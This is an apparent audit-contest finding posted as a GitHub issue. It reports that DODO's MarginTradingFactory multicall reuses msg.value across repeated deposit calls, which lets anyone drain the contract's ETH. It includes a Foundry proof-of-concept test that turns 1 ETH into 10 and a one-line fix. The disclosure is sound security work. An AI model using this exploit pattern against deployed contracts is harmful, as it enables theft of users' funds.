### ISSUE TITLE
evilakela - Anyone can steal ETH from MarginTradingFactory using multicall

### ISSUE THREAD

**Issue by sherlock-admin** [sherlock-audit/2023-05-dodo-judging#23]
evilakela

medium

# Anyone can steal ETH from MarginTradingFactory using multicall

## Summary
Anyone can steal ETH from `MarginTradingFactory` using multicall

## Vulnerability Detail
`MarginTradingFactory.cleanETH` can call only owner, but restiction can be bypassed using `MarginTradingFactory.multicall` because of using `msg.value` in cycle in `MarginTradingFactory.depositMarginTradingETH`: ETH sended only once, but `msg.value` used in each `depositMarginTradingETH` call in multicall

### PoC
```solidity
    function test_POC_multicall() public {
        vm.deal(address(marginTradingFactory), 9 ether);
        vm.deal(user1, 1 ether);

        assertEq(address(marginTradingFactory).balance, 9 ether);
        assertEq(address(user1).balance, 1 ether);

        vm.startPrank(user1);
        address mt = marginTradingFactory.createMarginTrading(2, new bytes(0), new bytes(0));
        bytes[] memory data = new bytes[](10);
        for (uint i; i < 10; ++i) { 
            data[i] = abi.encodeWithSelector(
                marginTradingFactory.depositMarginTradingETH.selector,
                mt, 
                false,
                0
            );
        }
        marginTradingFactory.multicall{value: 1 ether}(data);
        IMarginTrading(mt).withdrawETH(false, 10 ether, 0);
        vm.stopPrank();

        assertEq(address(marginTradingFactory).balance, 0);
        assertEq(address(user1).balance, 10 ether);
    }
```

## Impact
See summary

## Code Snippet
https://github.com/sherlock-audit/2023-05-dodo/blob/main/dodo-margin-trading-contracts/contracts/marginTrading/MarginTradingFactory.sol#L74-L87
https://github.com/sherlock-audit/2023-05-dodo/blob/main/dodo-margin-trading-contracts/contracts/marginTrading/MarginTradingFactory.sol#L203-L211

## Tool used
Manual Review

## Recommendation
Require that balance after multicall >= balance befoe

Duplicate of #24
